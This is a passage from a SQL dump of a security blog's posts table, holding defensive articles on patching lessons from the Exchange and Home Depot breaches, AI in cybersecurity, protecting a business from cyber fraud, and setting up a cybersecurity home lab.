Microsoft Exchange Server Attack (2021)</strong></h3>\r\n<span style=\"font-weight: 400\">A more recent example shows that the lesson also applies to how quickly fixes are applied once they exist, not only to software that is years out of date</span><span style=\"font-weight: 400\">.</span>\r\n\r\n<span style=\"font-weight: 400\">What Happened: In early 2021, a group of hackers launched a widespread attack on Microsoft Exchange email servers, affecting over 30,000 organizations in the United States and 60,000 globally.</span>\r\n\r\n<span style=\"font-weight: 400\">The Cause: The attackers exploited four zero-day vulnerabilities in on-premises Microsoft Exchange Server software. Because they were zero-days, no update existed when exploitation began; the damage spread because many organizations were slow to apply the emergency patches once Microsoft released them, and because patching alone does not remove an intruder who is already inside—servers compromised before the update stayed compromised until they were investigated and cleaned.</span>\r\n\r\n<span style=\"font-weight: 400\">The Impact: The breach allowed hackers to:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Gain unauthorized access to email accounts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Install malware</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Potentially exfiltrate sensitive data</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">This attack particularly affected small businesses, local governments, and organizations using on-premises Exchange servers.</span>\r\n<h3><strong>4. 
Home Depot Data Breach (2014)</strong></h3>\r\n<span style=\"font-weight: 400\">The Home Depot breach of 2014 illustrates how unpatched or poorly secured systems—including those of third parties—can lead to massive financial and reputational </span><span style=\"margin: 0px;padding: 0px\">damage</span><span style=\"font-weight: 400\">.</span>\r\n\r\n<span style=\"font-weight: 400\">What Happened: Hackers infiltrated Home Depot\'s point-of-sale (POS) systems and stole customer payment information over a period of five months.</span>\r\n\r\n<span style=\"font-weight: 400\">The Cause: The attackers exploited a vulnerability in a third-party vendor\'s system to gain initial access, then installed custom-built malware on Home Depot\'s POS systems. Note that the initial entry came through a third party rather than a missing patch on Home Depot\'s own servers, and the malware then ran on payment terminals for months without being detected—so the lesson is that patching, hardening and monitoring have to extend to POS devices and to every vendor that can reach your network.</span>\r\n\r\n<span style=\"font-weight: 400\">The Impact: The breach resulted in:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Theft of 56 million payment card numbers</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Compromise of 53 million email addresses</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\"><span style=\"font-weight: 400\">Significant financial losses and damage to Home Depot\'s reputation</span></span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">These real-life examples underscore the critical importance of regular software updates in maintaining robust cybersecurity. 
They demonstrate that neglecting updates can lead to severe consequences, including data breaches, financial losses, and reputational damage.</span>\r\n\r\n<span style=\"font-weight: 400\">To mitigate these risks, organizations and individuals should:</span>\r\n<ol>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement a robust patch management strategy that starts from an accurate inventory of the software and systems in use (you cannot patch what you do not know you have), prioritizes fixes for flaws that are actively being exploited, and includes a plan to retire software that no longer receives updates</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly check for and install software updates</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use automatic update features when available</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Educate employees about the importance of software updates</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Consider using patch management tools to streamline the update process</span></li>\r\n</ol>\r\n<span style=\"font-weight: 400\">By prioritizing regular software updates, we can significantly reduce the risk of falling victim to cyberattacks and ensure a more secure digital environment.</span>', '', NULL, NULL, 1, 'draft', '2024-12-06 14:56:43', '2026-01-12 21:41:44', 'Information Security', 'The Importance of Regular Software Updates: Lessons from Real-World Cyber Attacks', '', NULL),
(94, 'The Impact of AI on Cybersecurity', 'the-impact-of-ai-on-cybersecurity', 'Cybersecurity has become a critical concern for individuals and organizations alike. As cyber threats evolve and become more sophisticated, the role of Artificial Intelligence (AI) in strengthening our digital defenses has grown increasingly important. This article explores the significant impact of AI on cybersecurity, offering insights for those new to the field.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Understanding AI in Cybersecurity</h3>\r\nArtificial Intelligence refers to computer systems that can perform tasks that typically require human intelligence. In the context of cybersecurity, AI plays a crucial role in detecting, preventing, and responding to cyber threats\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Key Benefits of AI in Cybersecurity</h3>\r\n<ol>\r\n 	<li><strong>Enhanced Threat Detection</strong>: AI-powered systems can identify potential threats more quickly and accurately than traditional methods</li>\r\n 	<li><strong>Automated Response</strong>: AI can automatically respond to detected threats, minimizing the time between detection and action</li>\r\n 	<li><strong>Behavioral Analytics</strong>: AI analyzes user behavior and network traffic to identify unusual activities that may signal a security breach</li>\r\n 	<li><strong>Reduced False Positives</strong>: Advanced AI algorithms can more accurately differentiate between genuine threats and harmless anomalies</li>\r\n 	<li><strong>Predictive Analysis</strong>: AI can predict potential vulnerabilities and risks before they occur, allowing for proactive security measures</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">How AI Strengthens Cybersecurity</h3>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Real-Time Threat Detection</h3>\r\nAI-powered cybersecurity systems can learn and adapt over time, recognizing patterns and spotting deviations from the norm in real-time. 
This capability allows for faster identification of both known and unknown threats, giving organizations an edge over cybercriminals.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Network Security Management</h3>\r\nAI excels at monitoring and analyzing vast amounts of network traffic, a task that would be overwhelming for human security experts. By automating this process, AI can:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>Track internal and external threats</li>\r\n 	<li>Detect anomalies in user behavior</li>\r\n 	<li>Manage endpoint lifecycle</li>\r\n 	<li>Perform regular security audits</li>\r\n</ul>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Vulnerability Management</h3>\r\nAI systems can continuously scan IT ecosystems for vulnerabilities, assess existing security measures, and prioritize remediation efforts. This proactive approach helps organizations stay ahead of potential security breaches.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Phishing Detection</h3>\r\nAI enhances email filters by analyzing text patterns to flag suspicious emails and block various types of spam.  
This is particularly crucial as phishing attacks become increasingly sophisticated and harder to detect.\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">Challenges and Risks</h3>\r\nWhile AI offers numerous benefits to cybersecurity, it\'s important to be aware of potential challenges:\r\n<ol class=\"marker:text-textOff list-decimal pl-8\">\r\n 	<li><strong>AI-Powered Attacks</strong>: Cybercriminals can also leverage AI to develop more complex and evasive attack methods, and the defensive models themselves become targets: attackers can craft inputs designed to slip past a detection model or poison the data it learns from, so model output should be monitored and validated rather than trusted blindly</li>\r\n 	<li><strong>False Sense of Security</strong>: Over-reliance on AI systems may lead to complacency in other areas of cybersecurity; automated responses in particular can cause outages when a false positive triggers a block or isolation, so keep a human approval step for high-impact actions</li>\r\n 	<li><strong>Data Privacy Concerns</strong>: AI systems require vast amounts of data to function effectively, which may raise privacy issues</li>\r\n 	<li><strong>Skill Gap</strong>: The integration of AI in cybersecurity demands new skills from security professionals</li>\r\n</ol>\r\n<h3 class=\"mb-2 mt-6 text-lg first:mt-3\">The Future of AI in Cybersecurity</h3>\r\nAs AI technology continues to evolve, its role in cybersecurity is expected to grow. Future developments may include:\r\n<ul class=\"marker:text-textOff list-disc pl-8\">\r\n 	<li>More sophisticated predictive models for threat detection</li>\r\n 	<li>Enhanced automation of security processes</li>\r\n 	<li>Improved ability to detect and respond to zero-day vulnerabilities</li>\r\n 	<li>Greater integration of AI across all aspects of cybersecurity</li>\r\n</ul>\r\nThe impact of AI on cybersecurity is profound and far-reaching. For those new to cybersecurity, understanding the role of AI is crucial in navigating the complex digital landscape. While AI offers powerful tools for enhancing security, it\'s important to remember that it\'s not a silver bullet. 
A comprehensive cybersecurity strategy should combine AI capabilities with human expertise and traditional security measures.', '', NULL, NULL, 1, 'draft', '2024-12-05 23:11:13', '2026-01-12 21:41:44', 'OSINT Tool', 'The Impact of AI on Cybersecurity', '', NULL),
(95, 'How to Protect Your Business from Cyber Fraud', 'how-to-protect-your-business-from-cyber-fraud', '<span style=\"font-weight: 400\">Protecting your business from cyber fraud has become more crucial than ever. As technology advances, so do the tactics of cybercriminals, making it essential for businesses of all sizes to implement robust security measures. This comprehensive guide will explore various strategies and best practices to safeguard your business against cyber threats, ensuring the protection of your valuable data, financial assets, and reputation.</span>\r\n<h2><span style=\"font-weight: 400\">Understanding Cyber Fraud</span></h2>\r\n<span style=\"font-weight: 400\">Cyber fraud encompasses a wide range of malicious activities aimed at exploiting vulnerabilities in digital systems for financial gain or to cause disruption. Common types of cyber fraud include:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Phishing attacks</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Malware infections</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Ransomware</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Business email compromise (BEC)</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Data breaches</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Identity theft</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">These threats can lead to significant financial losses, damage to reputation, and legal consequences for businesses that fail to protect themselves adequately.</span>\r\n<h2><span style=\"font-weight: 400\">Essential Steps to Protect Your Business</span></h2>\r\n<h2><span style=\"font-weight: 400\">1. 
Know Your Data</span></h2>\r\n<span style=\"font-weight: 400\">Understanding the nature and amount of data your business handles is crucial for effective protection</span><a href=\"https://www.myknowledgebroker.com/blog/11-steps-to-protect-your-business-from-cyber-crime\"><span style=\"font-weight: 400\">1</span></a><span style=\"font-weight: 400\">. Conduct a thorough inventory of your digital assets, including:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Customer information</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Financial records</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Intellectual property</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Employee data</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">By identifying your most valuable and sensitive data, you can prioritize your security efforts and allocate resources more effectively.</span>\r\n<h2><span style=\"font-weight: 400\">2. Implement Robust Backup Systems</span></h2>\r\n<span style=\"font-weight: 400\">Creating regular backups of your business data is essential for recovery in case of a cyber attack or system failure</span><a href=\"https://www.myknowledgebroker.com/blog/11-steps-to-protect-your-business-from-cyber-crime\"><span style=\"font-weight: 400\">1</span></a><span style=\"font-weight: 400\">. 
Consider the following backup strategies:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement automated backup systems</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Store backups in secure, off-site locations</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use cloud storage solutions for added redundancy</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly test your backup and recovery processes</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Ensure that your backup systems are also protected with strong encryption and access controls to prevent unauthorized access. Keep at least one copy offline or in immutable storage, and do not make it writable from the accounts used for day-to-day work: ransomware that reaches your network will try to encrypt or delete every backup it can reach, and a backup that shares credentials with production offers no protection against that.</span>\r\n<h2><span style=\"font-weight: 400\">3. Train Employees in Security Principles</span></h2>\r\n<span style=\"font-weight: 400\">Your employees are often the first line of defense against cyber threats. Implement comprehensive security training programs that cover:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Recognizing phishing attempts and social engineering tactics</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Creating and managing strong passwords</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Safe internet browsing practices</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Proper handling of sensitive information</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Reporting suspicious activities or potential security breaches</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Regular training sessions and simulated phishing exercises can help reinforce good security habits among your staff.</span>\r\n<h2><span style=\"font-weight: 400\">4. 
Secure Your Network Infrastructure</span></h2>\r\n<span style=\"font-weight: 400\">A well-secured network is crucial for protecting your business from cyber attacks. Implement the following measures:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Install and maintain robust firewalls</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use virtual private networks (VPNs) for remote access</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Segment your network to isolate sensitive systems</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly update and patch all network devices and software</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement intrusion detection and prevention systems (IDS/IPS)</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider working with IT security professionals to assess and strengthen your network security posture</span><a href=\"https://www.fcc.gov/communications-business-opportunities/cybersecurity-small-businesses\"><span style=\"font-weight: 400\">2</span></a><span style=\"font-weight: 400\">.</span>\r\n<h2><span style=\"font-weight: 400\">5. Implement Strong Access Controls</span></h2>\r\n<span style=\"font-weight: 400\">Limiting access to sensitive information and systems is crucial for preventing unauthorized data breaches. 
Implement the following access control measures:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use the principle of least privilege, granting employees only the access they need</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement multi-factor authentication (MFA) for all accounts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly review and update user access rights</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use strong, unique passwords for all accounts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement a robust password management system</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Regularly audit your access controls to ensure they remain effective and up-to-date.</span>\r\n<h2><span style=\"font-weight: 400\">6. Secure Mobile Devices</span></h2>\r\n<span style=\"font-weight: 400\">With the increasing use of mobile devices in business operations, it\'s essential to implement a comprehensive mobile device management (MDM) strategy:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Require strong passwords or biometric authentication on all devices</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement remote wipe capabilities for lost or stolen devices</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use mobile device encryption</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Restrict the installation of unauthorized apps</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly update and patch mobile operating systems and applications</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Educate employees on the importance of mobile security and the potential risks associated with using 
personal devices for work purposes.</span>\r\n<h2><span style=\"font-weight: 400\">7. Protect Your Wi-Fi Networks</span></h2>\r\n<span style=\"font-weight: 400\">Secure Wi-Fi networks are essential for preventing unauthorized access to your business systems. Implement the following measures:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use strong encryption for all wireless networks—WPA3, or WPA2 with AES where WPA3 is not available—together with a long passphrase; WEP and the original WPA are broken and should be disabled</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Change default router passwords and SSIDs</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Do not rely on hiding the SSID: a hidden network is still visible to anyone scanning wireless traffic, and devices configured to join it broadcast its name wherever they go, so treat SSID hiding as cosmetic rather than as a security control</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement a separate guest network for visitors</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly update router firmware</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider implementing network access control (NAC) solutions to further enhance your Wi-Fi security.</span>\r\n<h2><span style=\"font-weight: 400\">8. Implement Email Security Measures</span></h2>\r\n<span style=\"font-weight: 400\">Email remains a primary vector for cyber attacks. 
Protect your business email systems by:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implementing spam filters and anti-phishing tools</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Using email encryption for sensitive communications</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Educating employees on identifying and reporting suspicious emails</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implementing sender policy framework (SPF), DomainKeys Identified Mail (DKIM) and domain-based message authentication, reporting, and conformance (DMARC) on every domain you send from—DMARC works by checking SPF or DKIM alignment, so publishing it without them achieves little, and a DMARC policy of none only generates reports; move to quarantine or reject once the reports confirm your legitimate senders are covered</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly backing up email data</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider using advanced email security solutions that leverage artificial intelligence and machine learning to detect and prevent sophisticated email-based threats.</span>\r\n<h2><span style=\"font-weight: 400\">9. 
Develop a Comprehensive Cybersecurity Policy</span></h2>\r\n<span style=\"font-weight: 400\">Create a detailed cybersecurity policy that outlines:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Acceptable use of company systems and data</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Password requirements and management practices</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Incident response procedures</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Data handling and privacy guidelines</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Remote work security protocols</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Third-party vendor security requirements</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Regularly review and update your cybersecurity policy to address emerging threats and changing business needs.</span>\r\n<h2><span style=\"font-weight: 400\">10. 
Implement Endpoint Protection</span></h2>\r\n<span style=\"font-weight: 400\">Secure all devices that connect to your network, including computers, laptops, smartphones, and IoT devices:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Install and maintain up-to-date antivirus and anti-malware software</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement endpoint detection and response (EDR) solutions</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use application whitelisting to prevent unauthorized software execution</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly patch and update all endpoint devices and applications</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement disk encryption on all devices storing sensitive data</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider using unified endpoint management (UEM) solutions to centralize control and security of all your endpoints.</span>\r\n<h2><span style=\"font-weight: 400\">11. 
Secure Your E-commerce Platform</span></h2>\r\n<span style=\"font-weight: 400\">If your business engages in online sales, securing your e-commerce platform is crucial:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Choose a reputable e-commerce platform with built-in security features</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Serve the entire site over HTTPS using current TLS versions, not only the checkout pages—SSL and early TLS versions are obsolete and should be disabled, and an unencrypted page anywhere on the site lets an attacker inject content that captures data before it ever reaches the encrypted checkout</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use a secure payment gateway that complies with PCI DSS standards, ideally one where card details are entered directly into the gateway and never pass through your own servers, which also greatly reduces your PCI DSS scope</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly update and patch your e-commerce software</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement strong authentication for admin access to your e-commerce platform</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly monitor for suspicious activities or unauthorized changes, including changes to the scripts loaded on checkout pages, since payment-skimming attacks work by inserting code there</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider working with a cybersecurity expert to perform regular security assessments of your e-commerce infrastructure.</span>\r\n<h2><span style=\"font-weight: 400\">12. Develop an Incident Response Plan</span></h2>\r\n<span style=\"font-weight: 400\">Despite your best efforts, security incidents may still occur. 
Develop a comprehensive incident response plan that outlines:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Roles and responsibilities during a security incident</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Steps for containing and mitigating the impact of a breach</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Communication protocols for notifying stakeholders and authorities</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Procedures for preserving evidence for forensic analysis</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Steps for recovery and returning to normal operations</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Lessons learned and improvement processes</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Regularly test and update your incident response plan through tabletop exercises and simulations.</span>\r\n<h2><span style=\"font-weight: 400\">13. Stay Informed About Emerging Threats</span></h2>\r\n<span style=\"font-weight: 400\">The cybersecurity landscape is constantly evolving. 
Stay informed about the latest threats and vulnerabilities by:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Subscribing to cybersecurity newsletters and threat intelligence feeds</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Participating in industry-specific information sharing forums</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Attending cybersecurity conferences and workshops</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Engaging with cybersecurity professionals and consultants</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly reviewing guidance from government cybersecurity agencies</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Use this knowledge to continuously improve your security posture and adapt to new threats</span><a href=\"https://www.getcybersafe.gc.ca/en/resources/get-cyber-safe-guide-small-businesses\"><span style=\"font-weight: 400\">5</span></a><span style=\"font-weight: 400\">.</span>\r\n<h2><span style=\"font-weight: 400\">14. Implement Vendor Risk Management</span></h2>\r\n<span style=\"font-weight: 400\">Many cyber attacks occur through vulnerabilities in third-party systems. 
Implement a robust vendor risk management program:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Assess the security practices of all vendors before engagement</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Include security requirements in all vendor contracts</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Regularly audit vendor compliance with security standards</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Limit vendor access to only necessary systems and data</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Implement secure file sharing and collaboration tools for vendor interactions</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Consider using vendor risk management platforms to streamline the assessment and monitoring process</span><a href=\"https://www.mass.gov/info-details/protect-your-company-from-cyber-attacks\"><span style=\"font-weight: 400\">4</span></a><span style=\"font-weight: 400\">.</span>\r\n<h2><span style=\"font-weight: 400\">15. 
Conduct Regular Security Assessments</span></h2>\r\n<span style=\"font-weight: 400\">Regularly assess your organization\'s security posture to identify and address vulnerabilities:</span>\r\n<ul>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Perform internal and external vulnerability scans</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Conduct penetration testing to simulate real-world attacks</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Engage in red team exercises to test your defenses</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Perform regular security audits of your systems and processes</span></li>\r\n 	<li style=\"font-weight: 400\"><span style=\"font-weight: 400\">Use security information and event management (SIEM) tools for continuous monitoring</span></li>\r\n</ul>\r\n<span style=\"font-weight: 400\">Use the results of these assessments to prioritize security improvements and allocate resources effectively.</span>\r\n\r\n<span style=\"font-weight: 400\">Protecting your business from cyber fraud requires a multi-layered approach that combines technology, processes, and people. By implementing the strategies outlined in this guide, you can significantly reduce your risk of falling victim to cyber attacks and ensure the long-term security and success of your business. Remember that cybersecurity is an ongoing process, and staying vigilant and adaptable is key to maintaining a strong security posture in the face of evolving threats.</span>', '', NULL, NULL, 1, 'draft', '2024-12-01 17:00:39', '2026-01-12 21:41:44', 'Information Security', 'How to Protect Your Business from Cyber Fraud', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(96, 'Create Your HomeLab for Cybersecurity', 'create-your-homelab-for-cybersecurity', '<div class=\"paragraph normal ng-star-inserted\" data-start-index=\"36\">\r\n\r\nA home lab is a valuable tool for anyone interested in cybersecurity. It allows you to experiment in a safe environment and learn about different aspects of cybersecurity without risking damage to your primary systems or data. The concept of a home lab is similar to the \"smart books\" used in the military, which contain crucial information, checklists, and procedures for specific missions.\r\n\r\n<strong>Here\'s a guide to help you create your own cybersecurity home lab:</strong>\r\n\r\n<strong>1. Virtualization:</strong>\r\n<ul>\r\n 	<li>Virtualization is the core of a home lab. It allows you to run multiple operating systems (like Windows, Linux) on a single physical machine.</li>\r\n 	<li>This technology has been around for a long time. In the 1960s, IBM\'s M44/44X Project used a mainframe to simulate multiple computers, leading to the term \"virtual machine.\"</li>\r\n 	<li>Popular virtualization software options include <strong>VMware Workstation Player (for Windows and Linux) and Oracle VirtualBox (for Windows, Linux, and macOS).</strong></li>\r\n</ul>\r\n<strong>2. Choose an Operating System:</strong>\r\n<ul>\r\n 	<li><strong>Kali Linux</strong> is a popular choice for a cybersecurity lab.\r\n<ul>\r\n 	<li>It\'s specifically designed for penetration testing and security auditing.</li>\r\n 	<li>It comes pre-loaded with hundreds of tools for tasks like vulnerability scanning, network analysis, and exploit development.</li>\r\n</ul>\r\n</li>\r\n 	<li><strong>Parrot OS</strong> is another Debian-based Linux distribution focused on security, privacy, and development.\r\n<ul>\r\n 	<li>Like Kali Linux, it offers a vast collection of security tools.</li>\r\n 	<li>It\'s known for its user-friendly interface and strong focus on anonymity and privacy.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>3. 
Setting Up Your Virtual Machine:</strong>\r\n<ul>\r\n 	<li>Once you have your virtualization software and chosen operating system (like Kali Linux), follow these steps:\r\n<ul>\r\n 	<li>Download the ISO image of the OS from the project\'s official site and verify its published checksum (or signature) before using it, so you are not installing a tampered image.</li>\r\n 	<li>Create a new virtual machine within your virtualization software.</li>\r\n 	<li>Allocate sufficient resources like RAM (2GB or more is recommended) and hard disk space (at least 20GB).</li>\r\n 	<li>Configure the network settings deliberately. NAT (Network Address Translation) lets the virtual machine share your host machine\'s internet connection, which is fine for the attacker VM while you install updates and tools. Intentionally vulnerable VMs, however, should sit on a host-only or internal network with no route to the internet or to your home LAN, so that anything running on them cannot reach your real systems.</li>\r\n 	<li>Install the operating system on the virtual machine.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>4. Installing Essential Tools:</strong>\r\n<ul>\r\n 	<li><strong>Update your system:</strong> Before you start, ensure your Kali Linux installation is up-to-date.</li>\r\n 	<li><strong>Package Manager:</strong> Kali Linux uses the APT (Advanced Package Tool) for installing, updating, and removing software packages.</li>\r\n 	<li><strong>Pimp My Kali:</strong> Consider using the \"Pimp My Kali\" script to automate the installation and configuration of essential tools and fix common issues in Kali Linux. It is a third-party script that runs with root privileges, so fetch it only from its official repository and read through it before executing it, as you would with any script downloaded from the internet.</li>\r\n 	<li><strong>Other Tools:</strong> Depending on your learning goals, you can install additional tools like:\r\n<ul>\r\n 	<li><strong>Nmap:</strong> For network scanning and host discovery.</li>\r\n 	<li><strong>Metasploit:</strong> A framework for developing and executing exploits.</li>\r\n 	<li><strong>Burp Suite:</strong> For web application security testing.</li>\r\n 	<li><strong>Wireshark:</strong> For network traffic analysis.</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<strong>5. Practice and Experiment:</strong>\r\n<ul>\r\n 	<li>A home lab is your playground. 
